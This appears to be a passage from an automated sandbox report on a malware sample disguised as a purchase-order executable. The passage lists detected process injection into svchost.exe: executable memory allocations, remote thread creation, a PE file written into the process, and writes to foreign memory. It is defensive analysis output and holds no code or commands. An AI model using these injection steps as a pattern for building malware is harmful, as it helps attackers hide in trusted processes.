                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1200000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1210000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1220000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1230000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1240000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1250000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1260000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1270000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1280000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1290000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3310000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3320000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3330000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3340000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3350000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3360000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3370000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3380000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3390000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3410000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3420000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3430000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3440000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3450000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3460000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3470000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3480000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3490000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3500000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3510000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3520000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3530000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3540000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3550000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3560000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3570000 protect: page execute and read and write
                    Creates a thread in another existing process (thread injection)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 460000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 4A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 4E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: B40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: B80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: BC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: C00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: C40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: C80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: CC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: D00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: D40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: D80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: DC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: E00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: E40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: E80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: EC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: F00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: F40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: F80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: FC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1000000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1040000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1080000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 10C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1100000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1140000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 11C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1200000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1240000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1280000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 12C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3310000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3350000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3390000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 33D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3410000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3450000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3490000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 34D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3510000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3550000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3580000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3700000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3740000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3780000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 37C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 37F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5130000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5170000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 51B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 51E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5260000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 53B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 53F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5420000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 55A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 55E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5620000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5660000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 56A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 56E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5710000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5890000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 58D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5910000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5950000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5990000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 59D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5AD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5BD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5CD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5DD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5ED0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5FD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6010000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6050000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6090000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 60D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6110000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6150000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 61D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6200000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6380000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 63C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6400000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6440000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6480000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 64B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6630000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6660000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 67E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6820000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6860000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 68A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 68E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6920000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6960000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 69A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 69D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6B50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6B70000
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 50480000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Users\user\Desktop\New Order PO20011046.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 440000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 450000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 460000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 470000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 480000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 490000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D20000
